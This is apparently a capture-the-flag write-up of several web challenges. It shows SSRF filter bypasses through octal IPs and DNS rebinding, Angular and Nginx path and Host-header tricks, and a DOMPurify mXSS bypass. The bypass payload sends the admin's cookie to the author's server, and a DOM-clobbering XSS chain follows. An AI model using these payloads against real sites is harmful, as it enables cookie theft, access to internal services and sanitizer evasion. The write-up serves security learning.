The goal was to bypass WAF protection to access local resources.
app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')
def valid_ip(ip):
matches = app.re_ip.match(ip)
if matches == None:
return False
ip = list(map(int, matches.groups()))
if any(i > 255 for i in ip) == True:
return False
# Stay out of my private!
if ip[0] in [0, 10, 127] \
or (ip[0] == 172 and (ip[1] > 15 or ip[1] < 32)) \
or (ip[0] == 169 and ip[1] == 254) \
or (ip[0] == 192 and ip[1] == 168):
return False
return True
...
@app.route('/admin-status')
def admin_status():
if flask.request.remote_addr != '127.0.0.1':
return '🥺'
return app.flagIt can be done with octal IP notation http://0177.0.0.1/admin-status, which yields
The goal was to bypass a WAF again, but this time the IP adress was checked using ipaddress library.
def valid_ip(ip):
try:
result = ipaddress.ip_address(ip)
# Stay out of my private!
return result.is_global
except:
return False
...
def get(url, recursive_count=0):
r = requests.get(url, allow_redirects=False)
if 'location' in r.headers:
if recursive_count > 2:
return '🤔'
url = r.headers.get('location')
if valid_fqdn(urlparse(url).netloc) == False:
return '🤔'
return get(url, recursive_count + 1)
return r.textBecause the above code does two DNS resolves, first to check if private and second to request the resource, I simply added two A records to the DNS entry.
| Type | Hostname | Value | TTL (seconds) |
|---|---|---|---|
| A | double.terjanq.me | 127.0.0.1 | 30 |
| A | double.terjanq.me | 51.38.138.162 | 30 |
After a few attempts I got a flag:
The way I solved the challenge relies on luck. You either get a correct order of DNS resolves or not. A more reliable way of solving is to set up your own DNS server which will first respond with public IP and then the local one. Since the attack is similar to DNS Rebinding, one can use singularity to set up such a server.
Demo
Singularity provides DEMO application, so you can reuse their IP addresses s-35.185.206.165-127.0.0.1-RANDOM-fs-e.d.rebind.it
Note: Replace RANDOM with something RANDOM, it should yield the flag instantly
The challenge was about bypassing the Angular application that was set up behind Nginx reverse proxy. The challenge contained two flags:
- first was hidden in the angular endpoint
/debug/answerrestricted by the Nginx and the application - second hidden in the express endpoint
/api/true-answerwhich yielded results only for127.0.0.1IP addresses.
The goal was to access /debug/answer endpoint which was restricted in two ways:
- the nginx restricted access to
/debug*via:
location /debug {
# IP address restriction.
# TODO: add allowed IP addresses here
allow 127.0.0.1;
deny all;
}
- the application was rejecting requests containg a
debugword via:
if (process.env.FLAG && req.path.includes('debug')) {
return res.status(500).send('debug page is disabled in production env')
}I managed to score the first blood on this challenge via a simple request to /\%64ebug/answer.
curl --path-as-is 'http://universe.chal.ctf.westerns.tokyo/\%64ebug/answer'This works because angular recognizes \ as /, and %-decodes strings. Therefore it matched to debug/answer.
As mentioned, the application was displaying the flag if the request came from the loopback network.
server.get('/api/true-answer', (req, res) => {
console.log('HIT: %s', req.ip)
if (req.ip.match(/127\.0\.0\.1/)) {
res.json(`hello admin, this is true answer: ${process.env.FLAG2}`)
} else {
res.status(500).send('Access restricted!')
}
});Because the application was hidden behind Nginx proxy, req.ip was always pointing to the same IP address of the reverse proxy. The application didn't also trust X-Forwarded-* headers so this value couldn't be overridden.
When accessing /q endpoint, the application was displaying contents of /api/answer. It was done on the server-side via the below snippet.
ngOnInit(): void {
...
// fetch answer via API
this.service.getAnswer().subscribe((answer: string) => {
this.answer = answer
})
}
}this.service.getAnswer() was yielding this.http.get('/api/answer').
getAnswer() {
return this.http.get('/api/answer')
}Apparently angular when doing HTTP requests uses Host header, something around PROTOCOL + HOST + / PATH. Not only that but also follows the redirects. Therefore by providing a custom host and redirecting anything to 127.0.0.1/api/true-answer, we get the flag.
curl 'http://universe.chal.ctf.westerns.tokyo/a' -H 'Host: terjanq.me'When playing with the challenge, I also found a super fancy way of solving the challenge for the second flag.
curl 'http://universe.chal.ctf.westerns.tokyo' -H 'Host: \debug\answer'When Angular tries to match up the path, it parses the URL created from PROTOCOL + HOST + PATH. Because we injected \debug\answer as the host, the Angular parses http://\debug\answer\ and retrieves the path as /debug/answer. This is an ultimately odd behavior!
The code responsible for this odd behavior can be found here.
renderOptions.url =
renderOptions.url || `${req.protocol}://${(req.get('host') || '')}${req.originalUrl}`;This was basically the Flag#1 challenge, but the request was double proxied with Apache and Nginx.
Apache2 -> Nginx -> Express -> Angular
Unlike Nginx, Apache2 is very restrictive towards parsing the HTTP request. The Host header is very restrictive for invalid values and \ character is encoded with %5C. Therefore trick from #Bonus will not work.
Now not only the Nginx forbids /debug* but also Apache. It is blocked via:
<Location /debug>
Order Allow,Deny
Deny from all
</Location>While the challenge wasn't supposed to be too hard, it was proven to be so with the little number of solves on it.
Angular allows for secondary segments in the path, which is well explained in the article I found. Although it was clear to me it will be something with this feature, it took us hours on debugging and finding how to exploit this. By diving into Angular source codes, I discovered a primary segment in code, which quickly led me to the solution, which was http://another-universe.chal.ctf.westerns.tokyo/(primary:debug/answer).
This was probably the intended way of solving the previous challenge as well.
After visiting the URL, I got the flag
This was a client-side challenge, whose goal was to steal the admin's cookie.
The application was protected by DOMPurify in version 2.0.16 which during CTF happened to have a complete bypass in Chrome. A few days ago, Michał Bentkowski disclosed a very cool mXSS bypass for the sanitizer which abused strange behaviors of <math> elements which initial support has been recently added to Chrome.
The bypass was:
<form><math><mtext></form><form><mglyph><style><img src=x onerror=alert()>The fix seemed very weak against such powerful mutation, which only removed <math> elements containing <form> children. I fuzzed other elements with the following snippet:
var elms = ["a","abbr","acronym","address","area","article","aside","audio","b","bdi","bdo","big","blink","blockquote","body","br","button","canvas","caption","center","cite","code","col","colgroup","content","data","datalist","dd","decorator","del","details","dfn","dir","div","dl","dt","element","em","fieldset","figcaption","figure","font","footer","form","h1","h2","h3","h4","h5","h6","head","header","hgroup","hr","html","i","img","input","ins","kbd","label","legend","li","main","map","mark","marquee","menu","menuitem","meter","nav","nobr","ol","optgroup","option","output","p","picture","pre","progress","q","rp","rt","ruby","s","samp","section","select","shadow","small","source","spacer","span","strike","strong","style","sub","summary","sup","table","tbody","td","template","textarea","tfoot","th","thead","time","tr","track","tt","u","ul","var","video","wbr"];
for(let el of elms){
let p = `<form><math><mtext></form><${el}><mglyph><style><img>`;
document.body.innerHTML = p;
let old = document.body.innerHTML;
document.body.innerHTML = old;
if(document.body.innerHTML != old){
console.log(p);
}
}and it yielded another mutation with <table> and which can be simplified to:
<math><mtext><table><mglyph><style><img src=x onerror=alert()>This was a 0day for a split second (maybe a negative number :P), because seconds later, it was already fixed and announced in a tweet.
Too bad someone has tweeted it publicly on Twitter and broke the whole challenge...
The server restricted usage of some characters but crafting the payload was quite easy. My final payload sent to admin was:
<math><mtext><table><mglyph><style><img src=x onerror=location=location.pathname+/terjanq.me/+document.cookie>which leaked the cookies to my server, where also was the flag:
By looking at the flag, it clearly was not the intended solution so I spent some time finding another way.
The application was simulating the Brainf*ck decompiler and displayed the output to the page. However, it was protected by two mechanisms:
- before displaying it to the DOM,
<and>were replaced with their HTML entity equivalents.
// no xss please
output = output.replaceAll('<', '<').replaceAll('>', '>')
writeOutput();writeOutputfunction was protected by the following snippet.
function writeOutput() {
if (statusCode !== 3) {
if (CONFIG.unsafeRender) {
document.getElementById('output').innerHTML = output;
} else {
document.getElementById('output').innerText = output;
}
}
}Not only the application had to execute properly, but also CONFIG.unsafeRender had to be defined, to have any chances for XSS. However, if the application exited successfully, the output would not contain <, > characters.
Since the code was much more complicated than this, I included the whole code in the snippet bf.js.
There is an interesting feature in Google's reCAPTCHA that allows us to specify a function callback via data-callback attribute on g-recaptcha button. This, when clicked on the button, will invoke the specified callback function. From the spec, we can also notice data-error-callback which is explained as:
Optional. The name of your callback function, executed when reCAPTCHA encounters an error (usually network connectivity) and cannot continue until connectivity is restored. If you specify a function here, you are responsible for informing the user that they should retry.
By providing an invalid sitekey, it will instantly trigger an alert via:
<button class="g-recaptcha" data-sitekey="1337" data-error-callback="alert">With that, we could potentially invoke the writeOutput function even if the program hasn't exited properly. And because of that, output could contain unreplaced < and > characters, because the replaceAll function will never be called.
The CONFIG.unsafeRender check is easy to bypass with DOM Clobbering.
I did it via:
<a id=CONFIG name=unsafeRender>
<a id=CONFIG>Although the idea for the solution was simple, the execution of it was proven to be a little harder. After the program exits with an exception, the statusCode is set to 3 which we need to change back to something different. It can be done in two ways:
- By calling
initProgramwhich sets it back to0. - By calling
runProgramwhich sets it to1and then runs the program.
We can perform both steps by injecting two reCAPTCHA buttons:
<button class="g-recaptcha" data-sitekey="1337" data-error-callback="runProgram">
<button class="g-recaptcha" data-sitekey="1337" data-error-callback="writeOutput">The former method was problematic because if the program finished before writeOutput was invoked, the statusCode would once again be set to 3. To make it work, the program would have to be slowed down by some expensive operations.
The latter looks promising but has one downside. After initiating the program, it will also invoke the below snippet, which resets the prepared CONFIG clobbering in the payload because of innerText method.
program = document.getElementById('program').innerText;
document.getElementById('program').innerHTML = DOMPurify.sanitize(program).toString();However, I managed to bypass the innerText with a trick <<u>u>123 which after the first iteration will have u>123 underscored, and after the second one will have 123. This could be used to redefine clobbered properties.
With that, I crafted the following final payload:
----[---->+<]>---.--[->++<]>-.+.+++++.[->+++<]>+.-------.[->+++<]>.+[----->+<]>-.-.--.+++.--------------.+++.[++++>-----<]>.[----->++++<]>.+++++++++++.------------.-[--->+<]>-.--------.--------.+++++++++.++++++.[++>---<]>.[--->++<]>+++.-----.---------.+++++++++++.+++[->+++<]>.--[->+++<]>-.+++++++.-[--->++<]>.+++[->+++<]>.+++++++++++++.--------.---------.+++++++++++++.+++.-[->+++++<]>-.------.+[-->+++<]>-.
<<a id=CONFIG name=unsafeRender>a id=CONFIG name=unsafeRender>>
<<a id=CONFIG>a id=CONFIG>>
<button class="g-recaptcha" data-sitekey="123" data-error-callback="initProgram">
<button class="g-recaptcha" data-sitekey="1234" data-error-callback="writeOutput">
<!-- repeat to have a better chance for the correct order of calls -->
<button class="g-recaptcha" data-sitekey="1234" data-error-callback="writeOutput">
<button class="g-recaptcha" data-sitekey="1234" data-error-callback="writeOutput">
<button class="g-recaptcha" data-sitekey="1234" data-error-callback="writeOutput">which when visiting the https://bfnote.chal.ctf.westerns.tokyo/?id=e6857fd3f5d53d37 URL, rewrites the document to /terjanq/.
The first part of the payload is just <style/onload=document.write(/terjanq/)> encoded in Brainf*ck.